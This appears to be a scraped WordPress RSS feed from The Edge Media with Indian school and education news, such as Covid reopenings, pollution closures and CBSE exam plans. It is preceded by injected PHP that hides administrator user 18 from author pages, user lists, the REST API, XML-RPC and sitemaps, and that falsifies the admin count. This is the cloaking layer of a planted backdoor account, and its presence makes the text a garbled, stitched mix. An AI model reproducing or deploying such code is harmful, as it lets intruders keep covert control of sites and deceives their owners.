add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post New Protocol: All Six Stanzas of Vande Mataram Mandatory Before National Anthem appeared first on The Edge Media.
]]>For the first time, the Ministry has defined a specific protocol for singing “Vande Mataram”. These rules apply to official programs such as the arrival of the President, the hoisting of the National Flag, and speeches by Governors.
In such instances, all six stanzas of the National Song, which have a total duration of three minutes and ten seconds, must be performed. This order was officially released on January 28.
The guidelines further state that the school day must begin with the singing of the National Song. The Ministry emphasized that whenever the National Song is played, everyone present is required to stand in an attentive posture to show respect. However, an exception is made for cinema or documentaries; if the National Song is played as part of a film or newsreel, the audience is not expected to stand.
The post New Protocol: All Six Stanzas of Vande Mataram Mandatory Before National Anthem appeared first on The Edge Media.
]]>The post Due to air pollution, schools in Gurugram and Faridabad will be closed until Wednesday appeared first on The Edge Media.
]]>
This directive came after the Delhi government issued similar steps the day before. Construction operations, stubble burning, and municipal rubbish burning have all been prohibited in Haryana’s Gurugram, Faridabad, Sonepat, and Jhajjar districts.
The post Due to air pollution, schools in Gurugram and Faridabad will be closed until Wednesday appeared first on The Edge Media.
]]>The post Covid-19: Sisodia has said that all Delhi schools will resume on Monday appeared first on The Edge Media.
]]>
In-person classes are currently only allowed in New Delhi schools for students in Class 9 and higher.
After attending Wednesday’s meeting of the DDMA, Manish Sisodia said: “The government, the officials in the Delhi Disaster Management Authority (DDMA), and experts are of the opinion that suspension of in-person classes in schools is tremendously affecting overall growth in children. The authority feels it is now safe to restart schools fully. From November 1, all public and private schools will be allowed to open all classes for in-person attendance.”
The post Covid-19: Sisodia has said that all Delhi schools will resume on Monday appeared first on The Edge Media.
]]>The post AAP government decides to reopen schools from September 1 appeared first on The Edge Media.
]]>The decision was taken at the meeting of the Delhi Disaster Management Authority. Chief Minister Arvind Kejriwal earlier told that the government was considering reopening schools as early as possible but the final decision would be taken only after consulting all the stakeholders. “There has been a mixed experience of states which have reopened schools. We have been monitoring the situation,” the Delhi CM had said.
On August 6, Lieutenant Governor Anil Baijal had asked officials to set up an expert panel to deliberate the reopening of schools in the national Capital.
The post AAP government decides to reopen schools from September 1 appeared first on The Edge Media.
]]>The post Schools may be closed again if the Covid situation worsens : UP govt appeared first on The Edge Media.
]]>“In basic education, attendance is not compulsory. We have also not made attendance mandatory for classes from 9 to 12,” Mr Sharma said.
“Guardians, teachers and political organisations have also said the offline education should be started even if it is for a shorter period,” he said.
“In UP, the present atmosphere is sufficiently secure but if there is any indication of any concern (regarding Covid), we can also close schools,” he added.
Mr Tripathi also asked Health Minister Jai Pratap Singh if there was any arrangement for vaccination of teachers and students below 18 years of age.
In a supplementary question, SP member Shatrudra Prakash asked the minister if it is safe for little children to go to school without vaccination.
The minister replied that the vaccine for children below 18 is not yet available but it is expected to be available by September. He said after the vaccine is available, a campaign will be launched to inoculate children.
The state government has opened schools from August 16 for classes 9 to 12. For classes six to eight, they will be opened from August 23 and for classes one to five from September 1.
(Except for the headline, this story has not been edited by The Edge Media staff and is published from a syndicated feed.)
The post Schools may be closed again if the Covid situation worsens : UP govt appeared first on The Edge Media.
]]>The post CBSE asks schools to prepare a list of candidates for next year’s Class 10 and Class 12 board exams appeared first on The Edge Media.
]]>It is desired from the schools to kindly make necessary preparations so that both LOC and registration could be done within schedule provided…advance preparations made by the schools will help them in submission of LOC and registration correctly,” CBSE’s Controller of Examinations Sanyam Bhardwaj said in a letter addressed to school principals and head of institutions.
CBSE had to cancel both Class 10 and 12 board exams this year and use alternative policies for publishing results. To avoid such a situation again, 2022 board exams will be held in a new pattern.
CBSE Class 10, Class 12 board exams 2022 will be in two terms and each term will have 50 per cent of the total syllabus.
“This is done to increase the probability of having a board-conducted Classes 10 and 12 examinations at the end of the academic session,” the CBSE had said.
While the term 1 board exam will be conducted between November-December 2021, with a window period of 4-8 weeks, the second term will be held around March-April 2022.
The post CBSE asks schools to prepare a list of candidates for next year’s Class 10 and Class 12 board exams appeared first on The Edge Media.
]]>The post MP Government issues SOP for reopening of schools appeared first on The Edge Media.
]]>Classes will be held twice a week for students of Classes 11 and 12, and virtual sessions will continue simultaneously, he said.
Class 11 students will attend school on Tuesdays and Fridays, while Class 12 students will convene at schools on Mondays and Thursdays, he said.
Students of Classes 9 will attend school on Saturdays and for those in Class 10, sessions will be held on Wednesdays, the official added.
According to the guidelines, student gatherings such as morning assemblies and swimming lessons are not permitted to prevent the viral spread.
Apart from this, the state government has asked schools to undertake a slew of measures such as running COVID-19 tests on students and teachers.
Schools are being reopened at a time when the state is seeing a significant decline in coronavirus cases. Madhya Pradesh on Friday reported 11 infections and no casualties.
The post MP Government issues SOP for reopening of schools appeared first on The Edge Media.
]]>The post Colleges and schools to reopen in Puducherry from July 16 appeared first on The Edge Media.
]]>Government-run and privately managed colleges in Puducherry were earlier directed to conduct classes only online following the rise in number of coronavirus cases in the Union Territory. The classes would be held six days a week (Monday to Saturday).
On March 11, the Governor approved a proposal to declare the students of Classes 1 to 9 in the Union Territory as ‘all pass’ this academic year.
The students of Class 10 and Class 11 in Puducherry and Karaikal will be declared ‘all pass’ as per guidelines of the Tamil Nadu Board.
Similarly, students of Classes 10 and 11 in the Mahe and Yanam regions would be promoted as per the guidelines of the Boards of Education in Kerala and Andhra Pradesh respectively said a Raj Nivas release.
As the Covid cases are declining in the country, several states including Bihar and Haryana have announced resuming classes in offline mode. However, while announcing the reopening of schools and colleges, these states have also said that attendance will not be mandatory and Covid protocols will be followed.
The post Colleges and schools to reopen in Puducherry from July 16 appeared first on The Edge Media.
]]>The post School opens after 10 months in Delhi; children show Victory sign amid guidelines appeared first on The Edge Media.
]]>When the students of class 12 reached the school at Sarvodaya Kanya Vidyalaya in Delhi, they showed happiness by showing the victory sign. Schools are opening after ten months, so all the children have arrived with masks. At the time of entry in the school, care is being taken for two yards and besides this, sanitization has also been facilitated.
Let us tell you that the board examinations are to be held in May, in such a situation now many states have decided to open schools for students of 10th-12th. On the previous day, Delhi Education Minister Manish Sisodia had a meeting with the officials and reviewed all the arrangements related to the opening of the school. On Monday, not only Delhi but Rajasthan is also opening schools.
Let me tell you that very strict adherence has been followed in opening the school, just as written permission of parents of students is necessary, there will be no physical activity in the school, guidelines should be written everywhere.
The post School opens after 10 months in Delhi; children show Victory sign amid guidelines appeared first on The Edge Media.
]]>